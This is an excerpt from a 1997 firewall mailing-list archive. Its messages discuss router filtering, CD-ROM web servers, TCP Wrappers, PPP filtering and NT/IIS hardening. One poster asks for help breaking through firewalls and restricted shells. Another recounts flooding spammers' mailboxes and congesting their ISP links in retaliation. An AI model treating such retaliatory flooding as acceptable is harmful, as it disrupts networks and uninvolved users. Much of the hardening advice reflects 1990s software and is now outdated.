  don't let any internal->internal packets reach the DMZ/firewall

These are the general usages for those routers. Of course you can add additional tasks or leave some out, depending on your local security policy.

> If I am using a cisco router, how does one go about this? or can I get a
> location for documentation.

www.cisco.com and the CD which is delivered with your cisco router.

Greetings
Bernd
-- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( ..
) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy From firewalls-owner Wed Jan 8 23:43:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA26270 for firewalls-outgoing; Wed, 8 Jan 1997 23:15:48 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24956 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:54:48 -0800 (PST) Received: from www.biella.alpcom.it (www.biella.alpcom.it [194.243.65.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA06301 for ; Tue, 7 Jan 1997 12:28:18 -0800 (PST) From: uskanbye@ibmmail.com Received: from ferraris.biella.alpcom.it by www.biella.alpcom.it; (5.65v3.2/1.1.8.2/05Mar96-0237PM) id AA23214; Tue, 7 Jan 1997 21:29:03 +0100 X-Mailer: XFMail 1.0 [p0] on Linux Received: from relay3.UU.NET by www.biella.alpcom.it; (5.65v3.2/1.1.8.2/05Mar96-0237PM) id AA32132; Mon, 6 Jan 1997 08:33:09 +0100 Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQbxhe04920; Mon, 6 Jan 1997 02:30:36 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA09504 for firewalls-outgoing; Sun, 5 Jan 1997 21:52:20 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id VAA09470 for firewalls@greatcircle.com; Sun, 5 Jan 1997 21:51:49 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA17474 for ; Tue, 31 Dec 1996 13:01:58 -0800 (PST) X-Uidl: 852547705.003 Message-Id: Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 3767; Tue, 31 Dec 96 16:01:20 EST Date: Tue, 31 Dec 1996 16:00:41 EST X-Sender-Info: Mitchell Ummel CSP CCP, KDHE Network Manager Office of Information Systems, Tech 
Services Section Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit To: firewalls@greatcircle.com Subject: Re: Air Force Web Site Hacked Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I don't agree with the premise that a CD-ROM based WWW server is a viable option. Unless your web site is very static (no databases, no HTML generation, no frequent updates?), this would be cumbersome indeed, and still NO guarantee against hacking. Case in point... unless your DNS server is also "CD-ROM based" as well (a silly proposition), a hacker can always point your WWW server domain name to another "hacked" IP address. Physical read-only storage may offer SOME protection, but still not hackproof (not to mention the probable performance penalty you'd pay for optical).

----------------WWW.INK.ORG\PUBLIC\KDHE-------------------
--------KANSAS DEPARTMENT OF HEALTH & ENVIRONMENT---------
----------Mills Bldg Suite 501 Topeka, KS 66612-----------
---------Phone (913) 296-5643 FAX (913) 296-8943----------

*** Forwarding note from I5004693--IBMMAIL 12/31/96 15:42 ***
Date: Tue, 31 Dec 1996 11:41:27 -0800 From: Mark Johnson To: Dale Drew CC: Michael Idengren , Christopher Klaus , firewalls@GreatCircle.COM Subject: Re: Air Force Web Site Hacked

Dale Drew wrote:
>
> I don't see how CDROM provides significant advantages on a WEB server
> "graffiti" attack.
>
> Using a CDROM web-server doesn't provide resistance to an
> attacker who gains access to the system as ROOT (or the user that owns
> the http process), and the system has some form of (or access to)
> writable media available.
>
> The attacker just repoints the httpd root tree to the writable media (eg;
> "/tmp") and away from the CDROM.
>
> http://www.security.mci.net
> ===============================================================
> Dale Drew MCI Telecommunications
> Sr. Manager internetMCI Security
> Engineering
> Voice: 703/715-7058 Internet: ddrew@mci.net
> Fax: 703/715-7066 MCIMAIL: Dale_Drew/644-3335
>
> At 11:57 PM 12/30/96 -0500, Michael Idengren wrote:
> >I don't know about the rest of you but I agree with the idea of putting a
> >webserver on a CD-ROM. I think the government can afford to write a new
> >CD every time they need to update someone's email address anyways :)
> >
> >Mike Idengren | MEISTER
> >---------------------------------+----------------------------------
> >Center for Information Technology| Alachua Free-Net IRC Administrator
> >Stetson University | WorldWide Free-Net IRC Network Coordinator
> >
>

I have not set one up yet (planned for July), but I believe you can have a totally CDROM machine, at least using Novell or NT. Bootable CDROMs and all data on CDROM so you would not have any writable media. Can anyone confirm or deny my thoughts?

Mark
--
Mark Johnson Network Project Manager St. Mary's Regional Med Ctr mark@hercules.reno.nv.us

---- End of mail text

Additional SMTP headers from original mail item follow:
Received: from relay1.UU.NET by ibmmail.COM (IBM VM SMTP V2R3) with TCP; Tue, 31 Dec 96 15:43:03 EST Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQbwna15264; Tue, 31 Dec 1996 15:42:24 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA12757 for firewalls-outgoing; Tue, 31 Dec 1996 11:35:24 -0800 (PST) Received: from heather.greatbasin.com (heather.greatbasin.com [140.174.194.41]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA12750 for ; Tue, 31 Dec 1996 11:35:17 -0800 (PST) Received: from marks (hercules.reno.nv.us [204.94.161.224]) by heather.greatbasin.com (8.8.4/8.7.3) with SMTP id LAA14508; Tue, 31 Dec 1996 11:34:30 -0800 (PST) Message-ID: <32C96C67.7D78@hercules.reno.nv.us> X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version:
1.0 References: <3.0.32.19961231124626.007717e4@166.45.1.38> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

From firewalls-owner Wed Jan 8 23:44:41 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA24931 for firewalls-outgoing; Wed, 8 Jan 1997 22:54:09 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24838 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:53:23 -0800 (PST) Received: from id.co.zw (a3-jhb-65.dial-up.net [196.26.216.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA24866 for ; Tue, 7 Jan 1997 08:18:08 -0800 (PST) Received: from miller.id.co.zw ([196.33.153.100]) by id.co.zw (8.6.11/8.6.9) with ESMTP id SAA13975 for ; Tue, 7 Jan 1997 18:15:08 +0200 Message-Id: <199701071615.SAA13975@id.co.zw> From: "Sean Miller" To: Subject: Help in any of the folowing if at all possible Date: Tue, 7 Jan 1997 16:05:01 +0200 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I need some help in getting through firewalls (and if anyone can, on getting through shells with restricted access or access denied). Please help.
Mark

From firewalls-owner Wed Jan 8 23:48:54 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA24886 for firewalls-outgoing; Wed, 8 Jan 1997 22:53:49 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24827 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:53:13 -0800 (PST) Received: from exch-bel1.attachmate.com (exch-bel1.attachmate.com [149.82.1.46]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA19840 for ; Tue, 7 Jan 1997 06:43:41 -0800 (PST) Received: by exch-bel1.attachmate.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFC65.DC2C2E40@exch-bel1.attachmate.com>; Tue, 7 Jan 1997 06:41:49 -0800 Message-ID: From: Darren Cromer To: "'Ricardo Alvarado'" , "'firewalls@GreatCircle.COM'" Subject: RE: internal filtering router - filter config? Date: Tue, 7 Jan 1997 06:41:49 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Why ICMP? I'm curious what inherent risk that would present. I too am setting up a screening firewall, but I want to allow pings to traverse the external router. (Any advice on how to filter all ICMP except pings?)

>----------
>From: Ricardo Alvarado[SMTP:ralvarado@avantel.com.mx]
>Sent: Friday, January 03, 1997 10:20 AM
>To: firewalls@GreatCircle.COM
>Subject: Re: internal filtering router - filter config?
>
>>What type of things would you filter on the internal router? or even
>>the external router? I am going to be installing a firewall real soon
>>and would really appreciate any help.
>>
>>-steve.
>>matkoski@dreamscape.com
>
>In your external router you'd block any ICMP traffic going back and
>forth, as well as any packets bearing one of your internal IP addresses,
>as a source address, especially if these are going INTO your protected
>network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill
>any ports that your users will not be using, and leave just mail, web,
>ftp, etc.
>
>ricardo
>ralvarado@avantel.com.mx
>
>

From firewalls-owner Wed Jan 8 23:59:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA24983 for firewalls-outgoing; Wed, 8 Jan 1997 22:55:10 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24964 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:54:56 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA08128 for ; Tue, 7 Jan 1997 13:07:50 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id NAA18072; Tue, 7 Jan 1997 13:06:34 -0800 Received: from cidexchange.infosel.com.mx(148.246.8.22) by mycroft via smap (V1.3mjr) id sma018063; Tue Jan 7 13:05:44 1997 Received: by cidexchange.infosel.com.mx with Microsoft Exchange (IMC 4.0.837.3) id <01BBFCAB.9DC681A0@cidexchange.infosel.com.mx>; Tue, 7 Jan 1997 15:01:09 -0600 Message-ID: From: Jaime Alberto Botello Cantú To: "'firewalls@GreatCircle.COM'" Cc: "'matkoski@dreamscape.com'" , "'Ricardo Alvarado'" Subject: RE: internal filtering router - filter config? Date: Tue, 7 Jan 1997 15:01:03 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Steve,

It is very important to block any TCP traffic that comes with the established flag off. This is very important, for example, if you have intranets to protect; in this case, for example, you want to allow internal users to access web servers outside, but you don't want outside users to access your intranet web, ftp, etc. Doing this, you have to take some ftp things into consideration; you may need to use FTP passive connections for your internal users to access ftp servers outside.

Look, if you want more information you may get Building Internet Firewalls (O'Reilly & Associates) at www.greatcircle.com.

Hope this helps.

Jaime A Botello C
Departamento de Redes y Telecomunicaciones
Información Selectiva S.A. de C.V.
Calzada San Pedro #507 Colonia Fuentes del Valle, C.P. 66220
Tel: (528) 318-8943 Fax: (528) 318-8981
email: jbotello@infosel.com.mx

>
>
>-----Original Message-----
>From: Ricardo Alvarado [SMTP:ralvarado@avantel.com.mx]
>Sent: Viernes 3 de Enero de 1997 9:21 AM
>To: firewalls@GreatCircle.COM
>Subject: Re: internal filtering router - filter config?
>
>>What type of things would you filter on the internal router? or even
>>the external router? I am going to be installing a firewall real soon
>>and would really appreciate any help.
>>
>>-steve.
>>matkoski@dreamscape.com
>
>In your external router you'd block any ICMP traffic going back and
>forth, as well as any packets bearing one of your internal IP
>addresses,
>as a source address, especially if these are going INTO your protected
>network. Also, kill telnets, fingers, snmp and snmp trap. Actually,
>kill
>any ports that your users will not be using, and leave just mail, web,
>ftp, etc.
>
>ricardo
>ralvarado@avantel.com.mx
>

From firewalls-owner Thu Jan 9 02:14:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA07782 for firewalls-outgoing; Thu, 9 Jan 1997 01:57:53 -0800 (PST) Received: from dicsmss1.jrc.it (dicsmss1.jrc.it [139.191.1.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA07773 for ; Thu, 9 Jan 1997 01:57:41 -0800 (PST) Received: from ceo0912.jrc.it by dicsmss1.jrc.it (4.1/EB-950131-C) id AA03652; Thu, 9 Jan 97 11:03:03 +0100 Received: by ceo0912.jrc.it (SMI-8.6/SMI-SVR4) id KAA11431; Thu, 9 Jan 1997 10:53:28 +0100 Date: Thu, 9 Jan 1997 10:53:28 +0100 From: peter.maersk-moller@jrc.it (Peter Maersk-Moller) Message-Id: <199701090953.KAA11431@ceo0912.jrc.it> To: firewalls@GreatCircle.COM Subject: Re: CheckRite Laser Checks! Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Md5: ywYJvmMVYLzlS7KBP1+GRQ== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi firewall list subscribers.

This is not firewall related but it is firewall mailing list related. There are probably a lot of people getting tired of these commercial offers mailed to you through mailing lists. Instead of trying to stop them, how about allowing them, but advertising that the price for using them for distributing commercial offers is something like $100.000 or whatever will be too expensive. If a company then uses others' mailing lists for commercial distribution they have to pay for the service; however, you will probably need a court decision that allows you to charge a fee for companies using others' mailing lists. Does anybody know what the legal aspect of this is? I mean, there are a lot of services I will have to pay for if I use them. Is it legal for a company to use a service set up by me without paying for it? How do we create the legal grounds for charging companies that use other people's mailing lists for commercial junkmail distribution?

I used to trace down the sender of junkmail and fill their mailbox and congest their Internet connection or their ISP's Internet connection. After that I usually used to find the bosses of those responsible for sending junkmail to explain how much damage their employees have brought to their companies, but it seems there are too many incompetent loonies in the world.

Regards
Peter Maersk-Moller (Speaking for myself and nobody else)

From firewalls-owner Thu Jan 9 05:44:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA13574 for firewalls-outgoing; Thu, 9 Jan 1997 05:37:44 -0800 (PST) Received: from ram-exch-ns1.ramstein (ram-exch-ns1.ramstein.af.mil [132.25.130.19]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA13567 for ; Thu, 9 Jan 1997 05:37:29 -0800 (PST) Received: by ram-exch-ns1.ramstein with Microsoft Exchange (IMC 4.0.837.3) id <01BBFE3A.C164AF20@ram-exch-ns1.ramstein>; Thu, 9 Jan 1997 14:38:18 +0100 Message-ID: From: Franke Albert 2 Lt USAFE CSS/SCBS To: "'firewalls@GreatCircle.com'" Subject: TCP WRAPPERS FOR DEC ALPHA RUNNING NT 4.0??? Date: Thu, 9 Jan 1997 14:38:16 +0100 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>Thanks to everyone who responded to my last question. I got a lot of
>people who suggested using TCP Wrappers to add another layer of
>security. I did a lot of research (CERT etc), but only found TCP
>Wrappers for UNIX machines. Does anyone know where I can find a TCP
>Wrapper for a DEC Alpha (64 or 32 bit) running Windows NT 4.0? Thanks
>for your help.
>
>Albert E.
Franke, 2Lt, USAF >OIC, USAFE Web Tech Support 480-7905 > From firewalls-owner Thu Jan 9 06:29:51 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA15381 for firewalls-outgoing; Thu, 9 Jan 1997 06:25:50 -0800 (PST) Received: from relay-11.mail.demon.net (relay-11.mail.demon.net [194.217.242.137]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA15374 for ; Thu, 9 Jan 1997 06:25:39 -0800 (PST) Received: from martel.demon.co.uk ([158.152.221.102]) by relay-10.mail.demon.net id aa1017462; 9 Jan 97 14:02 GMT Message-ID: Date: Thu, 9 Jan 1997 10:24:42 +0000 To: firewalls@greatcircle.com From: Ian Gresley-Jones Subject: Re: packet filtering on PPP interfaces In-Reply-To: <9701062217.AA04330@omsk.quadrix.com> MIME-Version: 1.0 X-Mailer: Turnpike Version 3.00 <5FNnYA8I4VwTBaSmGLF2KtVCy5> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <9701062217.AA04330@omsk.quadrix.com>, BVE writes > >I figured that someone would've answered this one by now, but I haven't seen a >message on the list.... > > Is anyone aware of ppp implementation that include packet filtering? Or of > (nit-based?) packet filtering implementations that could be applied to a > ppp interface under Solaris 1 (Solaris 1.2 to be exact)? > >I once set up Morningstar PPP (on SunOs 4.1.3u1) to protect a small Unix box >from the Internet. It was a while ago, so I don't remember all the details, >but it provided what (at the time) seemed like a fairly good set of features, >for that type of software. It was pretty simple to configure.... > >I don't know if it's good enough for your needs, but it's a place to start.... > I'd definitely recommend looking at Morningstar - you can get various docs from the Web/ftp site (either www.morningstar.com or the site referred to from there because the company was bought out late last year I believe). 
The filtering facilities are good and they've implemented many other options like CHAP authentication etc. Costs about USD750 IIRC. You can get a one month free trial. Go for it!

Regards
Ian

#include I have no association with Morningstar or the current vendor of this product.
********************************************************************
* Ian Gresley-Jones ZZR600 *
* ********************************************************************

From firewalls-owner Thu Jan 9 06:46:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA15576 for firewalls-outgoing; Thu, 9 Jan 1997 06:30:27 -0800 (PST) Received: from exp2.is.xpark.pmh.org (exphub.is.xpark.pmh.org [198.215.78.104]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA15569 for ; Thu, 9 Jan 1997 06:30:08 -0800 (PST) Received: from localhost by exp2.is.xpark.pmh.org (AIX 3.2/UCB 5.64/4.03) id AA22045; Thu, 9 Jan 1997 08:22:20 -0600 Message-Id: <32D4FF1B.6956@exphub.pmh.org> Date: Thu, 09 Jan 1997 08:22:19 -0600 From: "Cary Conover(IS) 13897" Organization: Parkland Memorial Hospital X-Mailer: Mozilla 3.01Gold (X11; I; AIX 2) Mime-Version: 1.0 To: Chris Pugrud Cc: "'Franke Albert 2 Lt USAFE CSS/SCBS'" , Firewalls Mailing list Subject: Re: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Chris Pugrud wrote:
>
> This really is not as bad a situation as it seems. Here are a few
> pointers to vastly increasing the security of the system. This is not
> the be all or end all of security. I am sure that there are more steps
> that you can take to increase your security even more. Buyer Beware.
> Your mileage may vary...
>
> Apply sp2 for Windows NT 4.0
>   SP2 fixes several bugs in the OS and IIS
>   http://www.microsoft.com/ntserversupport/Default-SL.HTM
>
> The machine really should be used only for serving web pages. If you
> can dedicate a singular machine, even a 486, to just tossing HTTP then
> you can greatly increase the security.
>
> Under Control Panel > Services, only the following MUST be running for
> a web server:
>   EventLog
>   FTP Publishing Service (optional)
>   Plug and Play (NT 4.0)
>   Workstation
>   World Wide Web Publishing Service
> Only these services should be set "Automatic". All other services
> should be set "manual." Be careful, your mileage may vary...
>
> Use IIS security
>   IIS has some built in allow/deny filtering based on IP address
>   Internet Service Manager > WWW Service Properties > Advanced TAB
>
> CGI/BIN is BAD (by default)
>   Remove scripts and the HTML Administrator if installed
>   Internet Service Manager > Directories
>   Ideally only "C:\InetPub\wwwroot" "" is listed. Remove all
>   others, especially any that you can not identify.
>   While you are there make sure to go to "logging" and set up logs
>   Also go to c:\InetPub and set security
>   NT Explorer > C:\InetPub > right click > properties > security >
>   permissions
>     Replace Permissions on Subdirectories
>     Replace Permissions on Existing Files
>     Make Everyone Read (RX)(RX)
>     Make Administrator Full Control (All)(All)
>     Remove all others
>   This sets things up so that only the administrator can make changes
>   and they must be made from the machine.
>
> Use the OS security
>   NT 4.0 has basic packet filtering built in
>   Control Panel > Network > Protocols > TCP/IP > Properties > IP Address >
>   Advanced > Enable Security > Configure
>     Permit Only (TCP Ports) > Add > 80 (http)
>     Permit Only (UDP Ports) > (leave blank)
>     Permit Only (IP Protocols) > Add > 6 (TCP)
>   This really cuts down what the machine can do. If you need to surf
>   from the machine you may need to add 53 to UDP Ports.